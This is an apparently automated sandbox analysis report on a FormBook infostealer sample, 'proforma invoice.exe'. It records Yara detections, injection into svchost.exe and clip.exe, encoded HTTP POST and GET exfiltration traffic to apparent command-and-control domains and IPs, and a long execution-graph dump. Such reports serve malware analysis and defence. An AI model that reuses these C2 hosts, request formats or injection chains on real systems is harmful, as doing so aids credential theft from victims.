                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                31 | 192.168.2.4 | 49768 | 91.195.240.19 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:10.275573015 CEST | 10880 | OUT | POST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 54 44 42 4e 31 4e 4f 72 64 49 70 50 56 39 57 65 48 7a 46 51 64 46 59 47 57 77 64 30 32 39 7a 53 52 39 4a 63 4a 32 2b 37 41 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 75 4d 43 6d 59 36 4b 30 57 55 33 58 31 33 71 79 73 43 61 45 46 2f 34 76 59 78 72 41 49 64 59 31 6c 4f 56 52 48 31 4f 48 49 54 4c 44 34 61 4a 5a 6e 46 6b 4e 59 36 4a 52 73 63 52 67 71 6f 45 30 4b 48 41 77 36 6d 49 4c 31 47 6c 30 79 44 [TRUNCATED]
                Data Ascii: AZOTcfex=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhicrMrimTDBN1NOrdIpPV9WeHzFQdFYGWwd029zSR9JcJ2+7A8imTSJnGMYV0/evIyXm7nMT9lPvZ9eZ8LuMCmY6K0WU3X13qysCaEF/4vYxrAIdY1lOVRH1OHITLD4aJZnFkNY6JRscRgqoE0KHAw6mIL1Gl0yDGTKvVgTBRnEyILfJ7GonCuCHn8OczepwOWW7WbCsvI3gPJK4ogHgBbZoMNFyBJVZy51HmU5chAg6EaSOauaR5X8Y4vO4FxKMAh1kY4l5OeInFjFhRwDC7LVRKQtaJzhs4rM7axpX6La/OZCaQ/LFXneh5VUIZ1YEJMNdRKVUxCXnv/u/uswFS0L5N8X8FfdMW9Sm9hWCOiXy7WD7/E/IiJRHXNvWECeH8mBZQmk+fMvwltu5m4bKWfqWdZIWeqQGFz+9BOLI4Cy8ArfItxOk9qtVhZ9h+yp7S4RRRW4PXlhWNNSXfmQfq9L3il3dUMME9CIdEW945wdRoTcd1bPINPriv7nYtjl6m1WuZhrqzkDXlNPiHkvr4jNim86EYR9EEyigX/0pJF7J/2zfvRMrlsWPMm7ar0/LLAAoHF6MQ3OszwGhEA7IyGYR7SPN5iP0fRV54d/KBxfLBWahuh+B/P0HEDYcKaMUUHBrcDcS1Y6ZGjd6i0jIuTa94bnexK2eFKcjKSJl52ZGlKK1NP9MhA5cipobQs1HOeFJonxDbx/OC2w8BbOAU5YQltez3Nl59P5iP14ReIbUtABDOlYPILTgLBe0ECeScv78RD6vjmuxXxmdsZX32ccwlqZ6MU0hHVV1Z6MHPYIlrHG9MnOS/njgIAAxKeXsw6 [TRUNCATED]
                Aug 23, 2024 04:21:10.901503086 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                date: Fri, 23 Aug 2024 02:21:10 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                32 | 192.168.2.4 | 49769 | 91.195.240.19 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:12.805797100 CEST | 512 | OUT | GET /tf44/?AZOTcfex=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.gipsytroya.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:21:13.440695047 CEST | 113 | IN | HTTP/1.1 439
                date: Fri, 23 Aug 2024 02:21:13 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                33 | 192.168.2.4 | 49770 | 172.67.210.102 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:26.554316044 CEST | 775 | OUT | POST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 7a 51 6a 6d 74 6d 37 50 4f 64 61 34 4f 77 70 6f 47 51 67 33 59 65 2f 37 2f 66 7a 54 32 5a 31 41 51 3d 3d
                Data Ascii: AZOTcfex=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDzQjmtm7POda4OwpoGQg3Ye/7/fzT2Z1AQ==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                34 | 192.168.2.4 | 49771 | 172.67.210.102 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:29.095901966 CEST | 795 | OUT | POST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 36 4d 6d 34 57 48 65 31 6b 38 62 54 64 68 77 31 6a 70 2b 74 6f 76 4c 7a 44 76 79 2b 6e 43 43 62 6b 3d
                Data Ascii: AZOTcfex=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY6Mm4WHe1k8bTdhw1jp+tovLzDvy+nCCbk=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                35 | 192.168.2.4 | 49772 | 172.67.210.102 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:31.634447098 CEST | 10877 | OUT | POST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 7a 42 30 2f 4b 6d 76 6d 34 61 30 66 6d 45 36 58 45 56 48 2b 41 7a 76 68 65 49 57 44 78 7a 6b 33 4c 72 57 54 62 4a 75 77 70 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 59 72 47 39 39 53 47 6a 61 55 39 47 47 58 6e 34 65 4c 62 48 42 50 45 67 68 66 48 34 49 42 37 72 6b 61 78 57 33 6d 72 57 5a 57 69 2f 59 46 31 63 52 75 37 59 2f 62 4a 63 4a 68 79 46 62 54 5a 44 42 6e 2b 55 30 51 69 42 66 2f 52 76 62 58 61 75 34 50 4e 73 78 [TRUNCATED]
                Data Ascii: AZOTcfex=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAORuy8sRlzB0/Kmvm4a0fmE6XEVH+AzvheIWDxzk3LrWTbJuwp83Z3NOYbw8r3XDqAExcsNnQmUvYrG99SGjaU9GGXn4eLbHBPEghfH4IB7rkaxW3mrWZWi/YF1cRu7Y/bJcJhyFbTZDBn+U0QiBf/RvbXau4PNsxAHJT0B4EMIa9ZfzW01DxfFzZ6r0RX4/5hH1St9W01BIjSe8bgTUd3nHUn+tuYmg/ucZcMybVRBp5KP/91y45L1OXuthnjqy9KKpZvrIyq7Ki2EORYo1CcwLn2tr6/pYFN/YwjTVmQ+aRuwyfFDZBSgbPfqZk80KIQxAkR8X02Q4aLGsWH2phSyydG6xPWhm+Zg64kVQwnupGX+q+qqPl+ThfD2QoL51miY/+57uidmWr8Qz/6e/WaozNJLbtZsHIArN7oxSsFUADytqgUGbC98qx5hYk7U2tNvkvG/cYzY53GRgrYM2sAGRB1IcgVqRoCAUqSlQKZvvsxOY9IqoJLUXfDEVPUsjrIgXvO3Piz70JWGdUmTUY2zj1qDR2ScpGfypKyhtqMf8Rx6uDFkSAMEDmZpy+/2VBX00JWjqic5fzxuAltDxhDfhrkwcKLl13ul5oWk4dqYk1bbGU8MYS3pGMU2RVucW6Q8D/RV0unDMzTUPCPJB/2+TSleJ+zgdcfk3utst5sWwAzT/bDbLvTmwawRUVjvxL+AaWkm5kpmCtwa+UWppQUGJwj/iibIPbj3WwaaMqkJiGay+ttLcx407CrZ90SfpvPIMoR1ImiA0ArbEbAgvKXIKCt9TVWIx4364ILTavhqsNMr4xpoEcMbcmVtnc1w5Kfz [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                36 | 192.168.2.4 | 49773 | 172.67.210.102 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:34.179558992 CEST | 511 | OUT | GET /lfkn/?AZOTcfex=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.dmtxwuatbz.cc
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36



                Target ID:0
                Start time:22:17:53
                Start date:22/08/2024
                Path:C:\Users\user\Desktop\proforma invoice.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\proforma invoice.exe"
                Imagebase:0xaa0000
                File size:1'248'256 bytes
                MD5 hash:77F8DA00F3632972D585FF7EFB0BEA8C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:22:17:54
                Start date:22/08/2024
                Path:C:\Windows\SysWOW64\svchost.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\proforma invoice.exe"
                Imagebase:0x150000
                File size:46'504 bytes
                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:22:18:06
                Start date:22/08/2024
                Path:C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe"
                Imagebase:0x560000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:3
                Start time:22:18:07
                Start date:22/08/2024
                Path:C:\Windows\SysWOW64\clip.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\clip.exe"
                Imagebase:0x4a0000
                File size:24'576 bytes
                MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                Target ID:7
                Start time:22:18:20
                Start date:22/08/2024
                Path:C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe"
                Imagebase:0x560000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:8
                Start time:22:18:33
                Start date:22/08/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff6bf500000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true


                  Execution Graph

                  Execution Coverage:3%
                  Dynamic/Decrypted Code Coverage:2%
                  Signature Coverage:2.9%
                  Total number of Nodes:1975
                  Total number of Limit Nodes:54
                  execution_graph (interactive call-graph rendering; serialized node and edge data omitted)
96157 acf2d9 20 API calls _free 96089->96157 96093 ad8e08 96092->96093 96094 ad8e2e 96092->96094 96095 ad8e4a 96092->96095 96093->96094 96101 ad8e15 96093->96101 96158 acf2c6 20 API calls _free 96094->96158 96161 ad3820 21 API calls _free 96095->96161 96097 ad8e33 96159 acf2d9 20 API calls _free 96097->96159 96145 adf89b 96101->96145 96102 ad8e61 96105 ad29c8 _free 20 API calls 96102->96105 96103 ad8e3a 96160 ad27ec 26 API calls _strftime 96103->96160 96104 ad8fb3 96107 ad9029 96104->96107 96111 ad8fcc GetConsoleMode 96104->96111 96108 ad8e6a 96105->96108 96110 ad902d ReadFile 96107->96110 96109 ad29c8 _free 20 API calls 96108->96109 96112 ad8e71 96109->96112 96113 ad9047 96110->96113 96114 ad90a1 GetLastError 96110->96114 96111->96107 96115 ad8fdd 96111->96115 96116 ad8e7b 96112->96116 96117 ad8e96 96112->96117 96113->96114 96120 ad901e 96113->96120 96118 ad90ae 96114->96118 96119 ad9005 96114->96119 96115->96110 96121 ad8fe3 ReadConsoleW 96115->96121 96162 acf2d9 20 API calls _free 96116->96162 96164 ad9424 28 API calls __fread_nolock 96117->96164 96168 acf2d9 20 API calls _free 96118->96168 96137 ad8e45 __fread_nolock 96119->96137 96165 acf2a3 20 API calls 2 library calls 96119->96165 96132 ad906c 96120->96132 96133 ad9083 96120->96133 96120->96137 96121->96120 96126 ad8fff GetLastError 96121->96126 96122 ad29c8 _free 20 API calls 96122->96088 96126->96119 96127 ad8e80 96163 acf2c6 20 API calls _free 96127->96163 96128 ad90b3 96169 acf2c6 20 API calls _free 96128->96169 96166 ad8a61 31 API calls 3 library calls 96132->96166 96135 ad909a 96133->96135 96133->96137 96167 ad88a1 29 API calls __fread_nolock 96135->96167 96137->96122 96138 ad909f 96138->96137 96139->96062 96140->96056 96141->96061 96142->96062 96143->96071 96144->96073 96146 adf8a8 96145->96146 96148 adf8b5 96145->96148 96173 acf2d9 20 API calls _free 96146->96173 96150 adf8c1 96148->96150 96174 acf2d9 20 API calls _free 96148->96174 96149 adf8ad 96149->96104 96150->96104 96152 adf8e2 96175 ad27ec 26 
API calls _strftime 96152->96175 96154->96079 96155->96088 96156->96089 96157->96086 96158->96097 96159->96103 96160->96137 96161->96102 96162->96127 96163->96137 96164->96101 96165->96137 96166->96137 96167->96138 96168->96128 96169->96137 96170->96081 96171->96086 96172->96088 96173->96149 96174->96152 96175->96149 96179 ace4e8 96176->96179 96178 b1275d 96178->95936 96182 ace469 96179->96182 96181 ace505 96181->96178 96183 ace48c 96182->96183 96184 ace478 96182->96184 96189 ace488 __alldvrm 96183->96189 96192 ad333f 11 API calls 2 library calls 96183->96192 96190 acf2d9 20 API calls _free 96184->96190 96187 ace47d 96191 ad27ec 26 API calls _strftime 96187->96191 96189->96181 96190->96187 96191->96189 96192->96189 96197 b12e7a 96193->96197 96194 aa50f5 40 API calls 96194->96197 96195 b12d3b 96195->95865 96195->95882 96196 b128fe 27 API calls 96196->96197 96197->96194 96197->96195 96197->96196 96198 aa511f 64 API calls 96197->96198 96198->96197 96200 b122d9 96199->96200 96201 b122e7 96199->96201 96202 ace5eb 29 API calls 96200->96202 96203 b1232c 96201->96203 96204 ace5eb 29 API calls 96201->96204 96227 b122f0 96201->96227 96202->96201 96228 b12557 96203->96228 96206 b12311 96204->96206 96206->96203 96208 b1231a 96206->96208 96207 b12370 96209 b12395 96207->96209 96210 b12374 96207->96210 96211 ace678 